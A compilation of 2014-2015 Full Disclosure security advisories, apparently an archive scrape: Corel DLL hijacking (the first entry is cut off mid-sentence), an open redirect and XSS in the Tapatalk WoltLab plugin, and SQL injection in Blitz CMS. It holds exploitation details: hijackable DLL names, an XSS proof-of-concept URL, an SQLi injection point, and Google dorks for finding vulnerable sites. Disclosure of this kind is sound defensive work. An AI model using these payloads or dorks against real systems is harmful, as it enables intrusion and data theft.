7. *Technical Description / Proof of Concept Code*

[CVE-2014-8393] This vulnerability is caused by a DLL Hijacking when a file
associated with any of the following Corel applications is executed (CorelDRAW 
X7, Corel
 Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter 2015 or Corel PDF 
Fusion). The 
affected application should not be running for the vulnerability to work. The 
Corel 
software looks for a DLL file called "wintab32.dll" and does not control its 
path, therefore
 allowing to copy a malicious DLL file with the same name inside the folder 
where the 
associated file is. The DLL is executed within the context of the application.


[CVE-2014-8394] This vulnerability is caused by a DLL Hijacking when a file
associated with Corel CAD 2014 is executed. Corel CAD 2014 should not be 
running before
the associated file is executed for the vulnerability to work.
Corel CAD looks for a DLL file called "FxManagedCommands_3.08_9.tx" or 
"TD_Mgd_3.08_9.dll"
and does not control their path, therefore allowing to copy a malicious DLL 
file with the
same name of either DLL inside the folder where the associated file is. The DLL 
is
executed within the context of the application.


[CVE-2014-8395] This vulnerability is caused by a DLL Hijacking when a file 
associated with
Corel Painter 2015 is executed. Corel Painter 2015 should not be running before 
the associated
file is executed for the vulnerability to work. Corel Painter looks for a DLL 
file called 
"wacommt.dll" and does not control its path, therefore allowing to copy a 
malicious DLL file 
with the same name inside the folder where the associated file is. The DLL is 
executed within
the context of the application.


[CVE-2014-8396] This vulnerability is caused by a DLL Hijacking when a file 
associated with 
Corel PDF Fusion is executed. Corel PDF Fusion should not be running before the 
associated 
file is executed for the vulnerability to work. Corel PDF Fusion looks for a 
DLL file called
"quserex.dll" and does not control its path, therefore allowing to copy a 
malicious DLL file 
with the same name inside the folder where the associated file is. The DLL is 
executed within
the context of the application.


[CVE-2014-8397] This vulnerability is caused by a DLL Hijacking when a file 
associated with 
Corel VideoStudio PRO X7 or Corel FastFlix is executed. Corel Video Studio or 
Corel FastFlix
should not be running before the associated file is executed for the 
vulnerability to work. 
Corel PDF Fusion looks for a DLL file called "u32ZLib.dll" and does not control 
its path, 
therefore allowing to copy a malicious DLL file with the same name inside the 
folder where the
associated file is. The DLL is executed within the context of the application.


[CVE-2014-8398] This vulnerability is caused by a DLL Hijacking when a file 
associated with 
Corel FastFlick is executed. Corel FastFlick should not be running before the 
associated file

[FD] CVE-2014-8870: Arbitrary Redirect in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH 
The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to
version 1.1.2 allowed to redirect users to arbitrary URLs. This was possible by
specifying the target URL in the URL parameter board_url in URLs like the
following:

http://www.example.com/mobiquo/smartbanner/welcome.php?board_url=https://www.redteam-pentesting.de

CVE-2014-8870 was assigned to this issue.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpJHKIMmxNYT.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-015] Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH 
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning
  Board 4.0

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Tapatalk plugin for the WoltLab Burning Board forum software,
which allows attackers to inject arbitrary JavaScript code via URL
parameters.


Details
===

Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0
Affected Versions: >= 1.0.0
Fixed Versions: 1.1.2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://tapatalk.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015
Advisory Status: published
CVE: CVE-2014-8869
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869


Introduction


"Tapatalk is an app built for interacting with discussion forums on
mobile devices. It differs from a forum’s mobile web skin in that it
offers the speed of a native app and a streamlined unified interface for
every forum a user subscribes to. Tapatalk also creates a unique
eco-system that allows forums to be searched and discovered by millions
of Tapatalk users which in turn promotes content, new memberships, and
interactions."

(from Tapatalk's Homepage)


More Details


The Tapatalk extension includes the PHP script welcome.php at the path

com.tapatalk.wbb4/files/mobiquo/smartbanner/welcome.php

which is accessible via the URL

http://www.example.com/mobiquo/smartbanner/welcome.php

on systems using the plugin. It outputs JavaScript code that includes
improperly encoded values from the two URL parameters "app_android_id"
and "app_kindle_url". Depending on which parameters is used, one of
their values is assigned to the PHP variable $byo:


[...]

$.getJSON("",function(data){
[...]



Proof of Concept


The following URL can be used to demonstrate the vulnerability:

http://www.example.com/mobiquo/smartbanner/welcome.php
  ?app_kindle_url=");alert('RedTeam Pentesting');

[FD] Blitz CMS Community - SQL Injection Web Vulnerability

2015-01-12 Thread Vulnerability Lab 
Document Title:
===
Blitz CMS Community - SQL Injection Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1403


Release Date:
=
2015-01-12


Vulnerability Laboratory ID (VL-ID):

1402


Common Vulnerability Scoring System:

8.3


Product & Service Introduction:
===
http://www.blitzbasic.com/Products/_index_.php


Abstract Advisory Information:
==
An independent Vulnerability Laboratory Researcher discovered a remote sql 
injection web vulnerability in the official BlitzBasic Blitz CMS.


Vulnerability Disclosure Timeline:
==
2015-01-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

BlitzBasic
Product: Blitz CMS - Web Application (Community) 2015 Q1


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A sql injection web vulnerability has been discovered in the official 
BlitzBasic Blitz Content Management System (CMS).
The vulnerability allows an attacker to inject sql commands by usage of a 
vulnerable value to compromise the application dbms.

The sql injection vulnerability is located in the `id` value of the vulnerable 
`view_pic.php` application file. Remote attackers 
are able to inject own sql commands by usage of vulnerable id value in the 
`view_pic.php` file. A successful attack requires to 
manipulate a GET method request with vulnerable `id` value to inject own sql 
commands. The injection is a basic order by sql injection 
that allows to compromise the web-application and connected dbms. The attack 
vector of the issue is located on the application-side 
and the request method to inject own sql commands is GET.

The security risk of the sql injection vulnerability is estimated as high with 
a cvss (common vulnerability scoring system) count of 8.3.
Exploitation of the application-side web vulnerability requires no privileged 
web-application user account and no user interaction.
Successful exploitation of the security vulnerability result in web-application 
and database management system compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Community

Vulnerable File(s):
[+] view_pic.php

Vulnerable Parameter(s):
[+] id


Proof of Concept (PoC):
===
The remote sql injection web vulnerability can be exploited by remote attackers 
without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow 
the provided information and steps below to continue.

Google Dork:
inurl:".php?view_pic="
inurl:"Community/posts.php?topic="

PoC:
http://[localhost]/gallery/view_pic.php?id=-1'[SQL INJECTION VULNERABILITY]--

Reference(s):
http://[localhost]/Community/posts.php?topic=43068%27


Solution - Fix & Patch:
===
The vulnerability can be patched by a secure parse and encode of the 
vulnerability `id` value in the view_pic.php file.
Use a prepared statement to fix the issues fully and setup a own exception that 
prevents sql injection attacks.


Security Risk:
==
The security risk of the remote sql injection web vulnerability in the 
community post file is estimated as critical. (CVSS 8.3)


Credits & Authors:
==
IranGuard Security Team - P0!s0nC0d3


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
- www.evolution-sec.com
Contact:ad...@vulnerability-lab.com - 
resea...@vulnerability-lab.com- ad...@evolution-sec.com
Section:magazine.vulnerability-db.com   - 
vulnerability-lab.com/contact.php - 
evolution-